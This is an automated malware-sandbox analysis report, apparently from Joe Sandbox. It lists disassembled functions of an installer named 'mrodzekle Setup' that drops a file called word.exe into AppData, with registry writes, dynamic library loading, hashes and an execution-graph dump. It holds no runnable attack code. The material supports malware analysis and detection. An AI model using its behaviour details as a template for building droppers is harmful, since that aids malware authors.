                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                  • SendMessageA.USER32 ref: 00401C42
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: MessageSend$Timeout
                                  • String ID: !
                                  • API String ID: 1777923405-2657877971
                                  • Opcode ID: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                  • Instruction ID: 8eb34b9659dedbc099cc11ce9bc18cab6bc834bdcc036981f8d30f042af137bc
                                  • Opcode Fuzzy Hash: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                  • Instruction Fuzzy Hash: C621A171A44149BEEF02AFF4C94AAEE7B75EF44704F10407EF501BA1D1DAB88A40DB29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetWindowTextA.USER32(00000000,mrodzekle Setup), ref: 0040394C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: TextWindow
                                  • String ID: 1033$C:\Users\user\AppData\Roaming\word.exe$mrodzekle Setup
                                  • API String ID: 530164218-662814931
                                  • Opcode ID: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                  • Instruction ID: 9405f6c8d043b7fcf606726b90d8bdb5e10644d2b1bbff0bcd5da451eaf68503
                                  • Opcode Fuzzy Hash: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                  • Instruction Fuzzy Hash: D211CFB1F006119BC7349F15E88093777BDEB89716369817FE801A73E0D67DAE029A98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405691
                                  • CharPrevA.USER32(?,00000000), ref: 0040569A
                                  • lstrcatA.KERNEL32(?,00409010), ref: 004056AB
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040568B
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrcatlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 2659869361-4017390910
                                  • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                  • Instruction ID: e5ee9c2d52b027f92723a61f0ff242ac356e57f7af316d882355b101730f0027
                                  • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                  • Instruction Fuzzy Hash: 05D0A972606A302AE60227158C09F8B3A2CCF02321B040462F540B6292C2BC7D818BEE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FAF
                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                    • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                    • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                  • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                  • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401FCF
                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                  • String ID:
                                  • API String ID: 2987980305-0
                                  • Opcode ID: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                  • Instruction ID: 27648393275eec621602a0353e8cc2bfbc6c1dadd98057bfccdba155e6fc7477
                                  • Opcode Fuzzy Hash: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                  • Instruction Fuzzy Hash: 07215732D04215ABDF216FA48F4DAAE7970AF44354F60423FFA11B22E0CBBC4981D65E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?), ref: 00402374
                                  • lstrlenA.KERNEL32(0040A410,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                  • RegSetValueExA.ADVAPI32(?,?,?,?,0040A410,00000000), ref: 004023CD
                                  • RegCloseKey.ADVAPI32(?), ref: 004024B0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CloseCreateValuelstrlen
                                  • String ID:
                                  • API String ID: 1356686001-0
                                  • Opcode ID: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                  • Instruction ID: e6eb4e552242eddf296ff96e6d07a7eb6613d299afeb9756830ee7ce8f9eb162
                                  • Opcode Fuzzy Hash: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                  • Instruction Fuzzy Hash: 7111A271E00108BFEB10EFA5DE8DEAF7678EB40758F10443AF505B31D0C6B85D419A69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CharNextA.USER32(004054D1), ref: 0040572D
                                  • CharNextA.USER32(00000000), ref: 00405732
                                  • CharNextA.USER32(00000000), ref: 00405741
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CharNext
                                  • String ID: C:\
                                  • API String ID: 3213498283-3404278061
                                  • Opcode ID: df1f57800bc78783e49fb04f649057cff683ac7abc20f7779ba38a9a2f776efc
                                  • Instruction ID: 9935135ffb9a6864428372be34cefbf1708860cc48cffe50814e8a96023de109
                                  • Opcode Fuzzy Hash: df1f57800bc78783e49fb04f649057cff683ac7abc20f7779ba38a9a2f776efc
                                  • Instruction Fuzzy Hash: 99F0A761904B21D6EB2272744C84B6B579CDB55720F180437E100B71D197BC4C82AF9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CapsCreateDeviceFontIndirect
                                  • String ID:
                                  • API String ID: 3272661963-0
                                  • Opcode ID: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                  • Instruction ID: 0c2e595a2d755a053b7cc3d6c09569b1e3f8f946256c05fe5e222a6b1ed621d0
                                  • Opcode Fuzzy Hash: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                  • Instruction Fuzzy Hash: B0F0C870E48280AFE70157705F0ABAB3F64D715305F100876F251BA2E3C7B910088BAE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DestroyWindow.USER32 ref: 00402C04
                                  • GetTickCount.KERNEL32(00000000,00402DD1,00000001), ref: 00402C22
                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                  • String ID:
                                  • API String ID: 2102729457-0
                                  • Opcode ID: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                  • Instruction ID: 902fecb1894dce430947e24fe85b059bfb73d5b7bbd16117cdf5d745fa908bfb
                                  • Opcode Fuzzy Hash: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                  • Instruction Fuzzy Hash: 37F03030A09321ABC611EF60BE4CA9E7B74F748B417118576F201B11A4CB7858818B9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 00404E0A
                                  • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404E78
                                    • Part of subcall function 00403EA0: SendMessageA.USER32 ref: 00403EB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Window$CallMessageProcSendVisible
                                  • String ID:
                                  • API String ID: 3748168415-3916222277
                                  • Opcode ID: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                  • Instruction ID: 907b3508a45335f305929b628defbf7950d0c65962cf50d158fef9db48df65ea
                                  • Opcode Fuzzy Hash: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                  • Instruction Fuzzy Hash: 3B11BF71600208BFDF21AF61DC4099B3769BF843A5F40803BF604791A2C7BC4991DFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040352E,00403337,00000020), ref: 00403570
                                  • GlobalFree.KERNEL32(00000000), ref: 00403577
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403568
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Free$GlobalLibrary
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 1100898210-4017390910
                                  • Opcode ID: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                  • Instruction ID: e2315670824f3ca0981a6a6bf9743b5050639b1b799e450ff7e3175358b78d1c
                                  • Opcode Fuzzy Hash: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                  • Instruction Fuzzy Hash: 10E08C329010206BC6215F08FD0479A7A6C6B44B22F11413AE804772B0C7742D424A88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Roaming,00402CC1,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\word.exe,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 004056D8
                                  • CharPrevA.USER32(80000000,00000000), ref: 004056E6
                                  Strings
                                  • C:\Users\user\AppData\Roaming, xrefs: 004056D2
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrlen
                                  • String ID: C:\Users\user\AppData\Roaming
                                  • API String ID: 2709904686-2707566632
                                  • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                  • Instruction ID: dce4988d3f9ae1539138201c89f565164349ec5ceb08caa00e339266b5a49006
                                  • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                  • Instruction Fuzzy Hash: 7FD0A772809D701EF30363108C04B8FBA48CF12310F490862E042E6191C27C6C414BBD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405804
                                  • CharNextA.USER32(00000000), ref: 00405812
                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: lstrlen$CharNextlstrcmpi
                                  • String ID:
                                  • API String ID: 190613189-0
                                  • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                  • Instruction ID: 6e20b17ba46ab238fcbb7c8296b2df733f1dbfa59429a89b2dba5ca226b3377d
                                  • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                  • Instruction Fuzzy Hash: C2F02733209D51ABC202AB255C00A2F7E98EF91320B24003AF440F2180D339AC219BFB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:5.8%
                                  Dynamic/Decrypted Code Coverage:14.5%
                                  Signature Coverage:2.6%
                                  Total number of Nodes:690
                                  Total number of Limit Nodes:31
                                  execution_graph 23332 409440 15 API calls ctype 23333 409c40 46 API calls __Tolower 23440 408240 LeaveCriticalSection _Ungetc 23441 41e642 FreeLibrary 23445 41a647 42 API calls ___free_lconv_mon 23446 401649 107 API calls std::ios_base::failure::failure 23336 40e44b 43 API calls _Ungetc 23449 40ae50 68 API calls 4 library calls 23341 401051 44 API calls 2 library calls 23345 40f864 57 API calls 4 library calls 23346 401067 42 API calls pre_c_initialization 23456 42526b GetCommandLineA GetCommandLineW 23349 40c070 42 API calls 5 library calls 23458 417e79 7 API calls __wsopen_s 23159 40107f 23164 4036a0 23159->23164 23163 40109c 23165 4036b6 Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 23164->23165 23169 40a5a0 23165->23169 23168 40f84f 42 API calls __onexit 23168->23163 23178 4070b0 23169->23178 23173 40a5cc 23174 40a5e7 23173->23174 23189 40bc70 48 API calls std::ios_base::good 23173->23189 23176 401092 23174->23176 23190 40d673 9 API calls 2 library calls 23174->23190 23176->23168 23191 408ec0 23178->23191 23181 40f5a8 new 3 API calls 23182 407128 23181->23182 23183 40713c 23182->23183 23184 4040f0 std::ios_base::_Init 44 API calls 23182->23184 23185 40c450 23183->23185 23184->23183 23186 40c465 23185->23186 23229 4030f0 23186->23229 23188 40c46b std::ios_base::_Ios_base_dtor ctype 23188->23173 23189->23174 23190->23176 23194 408ee0 23191->23194 23195 408f08 23194->23195 23201 407121 23194->23201 23196 408f10 23195->23196 23197 408f1e 23195->23197 23219 410cd6 RaiseException 23196->23219 23199 408f58 23197->23199 23200 408f2f 23197->23200 23203 408f92 23199->23203 23204 408f69 23199->23204 23220 40aa90 47 API calls 2 library calls 23200->23220 23201->23181 23226 40aa90 47 API calls 2 library calls 23203->23226 23223 40aa90 47 API calls 2 library calls 23204->23223 23206 408f3a 23221 404050 40 API calls std::ios_base::failure::failure 23206->23221 23208 408f9d 23227 404050 40 API calls std::ios_base::failure::failure 
23208->23227 23210 408f74 23224 404050 40 API calls std::ios_base::failure::failure 23210->23224 23213 408f48 23222 410cd6 RaiseException 23213->23222 23214 408f82 23225 410cd6 RaiseException 23214->23225 23215 408fab 23228 410cd6 RaiseException 23215->23228 23219->23201 23220->23206 23221->23213 23222->23201 23223->23210 23224->23214 23225->23201 23226->23208 23227->23215 23228->23201 23230 40caf9 std::_Lockit::_Lockit 7 API calls 23229->23230 23231 403100 23230->23231 23243 404d30 23231->23243 23233 403112 23242 40312a 23233->23242 23249 406540 23233->23249 23236 4031a3 23236->23188 23238 403167 23260 40d3f8 RaiseException EnterCriticalSection LeaveCriticalSection new 23238->23260 23239 40314f std::bad_alloc::bad_alloc 23259 410cd6 RaiseException 23239->23259 23261 40cb51 LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 23242->23261 23244 404d41 23243->23244 23245 404d75 23243->23245 23246 40caf9 std::_Lockit::_Lockit 7 API calls 23244->23246 23245->23233 23247 404d4b 23246->23247 23262 40cb51 LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 23247->23262 23250 406553 23249->23250 23251 403147 23249->23251 23250->23251 23252 40f5a8 new 3 API calls 23250->23252 23251->23238 23251->23239 23253 406562 std::locale::c_str 23252->23253 23258 40658e 23253->23258 23263 403c80 23253->23263 23258->23251 23273 404680 67 API calls 3 library calls 23258->23273 23259->23242 23260->23242 23261->23236 23262->23245 23264 40caf9 std::_Lockit::_Lockit 7 API calls 23263->23264 23265 403c93 _Yarn 23264->23265 23266 403cf6 23265->23266 23283 404170 39 API calls std::exception::exception 23265->23283 23274 40d52f 23266->23274 23270 403ce8 23284 410cd6 RaiseException 23270->23284 23272 403a00 39 API calls 2 library calls 23272->23258 23273->23251 23285 4188c9 23274->23285 23277 40d382 _Yarn 14 API calls 23279 40d553 23277->23279 23278 40d563 23281 40d382 _Yarn 14 API calls 23278->23281 23279->23278 23280 4188c9 std::_Locinfo::_Locinfo_ctor 66 API calls 
23279->23280 23280->23278 23282 403d03 23281->23282 23282->23272 23283->23270 23284->23266 23290 41e5f7 23285->23290 23287 4188d6 23288 418674 std::_Locinfo::_Locinfo_ctor 66 API calls 23287->23288 23289 40d53b 23288->23289 23289->23277 23311 41e001 5 API calls std::_Lockit::_Lockit 23290->23311 23292 41e5fc 23312 41e01b 5 API calls std::_Lockit::_Lockit 23292->23312 23294 41e601 23313 41e035 5 API calls std::_Lockit::_Lockit 23294->23313 23296 41e606 23314 41e04f 23296->23314 23300 41e610 23318 41e083 5 API calls std::_Lockit::_Lockit 23300->23318 23302 41e615 23319 41e09d 5 API calls std::_Lockit::_Lockit 23302->23319 23304 41e61a 23320 41e0b7 5 API calls std::_Lockit::_Lockit 23304->23320 23306 41e61f 23307 41e0eb std::_Lockit::_Lockit 5 API calls 23306->23307 23308 41e624 23307->23308 23321 41e0d1 23308->23321 23310 41e629 23310->23310 23311->23292 23312->23294 23313->23296 23315 41e1ea std::_Lockit::_Lockit 5 API calls 23314->23315 23316 41e065 23315->23316 23317 41e069 5 API calls std::_Lockit::_Lockit 23316->23317 23317->23300 23318->23302 23319->23304 23320->23306 23322 41e1ea std::_Lockit::_Lockit 5 API calls 23321->23322 23323 41e0e7 23322->23323 23323->23310 23459 414600 RtlUnwind 23356 401c0b 48 API calls 23358 405010 14 API calls 2 library calls 23462 403e10 39 API calls std::exception::exception 23359 41ac16 8 API calls ___vcrt_uninitialize 23360 407018 15 API calls 2 library calls 23466 40d622 9 API calls 3 library calls 23057 240a42 23058 240a49 23057->23058 23059 240a55 23058->23059 23060 24020a 14 API calls 23058->23060 23061 240e38 ExitProcess 23058->23061 23060->23058 23365 407830 EnterCriticalSection _Ungetc 23469 413e30 6 API calls 4 library calls 23471 414e36 15 API calls 3 library calls 23368 407038 42 API calls 2 library calls 23370 40b8c0 69 API calls fpos 23473 40fac3 47 API calls 5 library calls 23062 40cacc 23063 40caf4 23062->23063 23064 40cadc 23062->23064 23064->23063 23066 40ed65 23064->23066 23069 40f42f 23066->23069 23070 40f441 
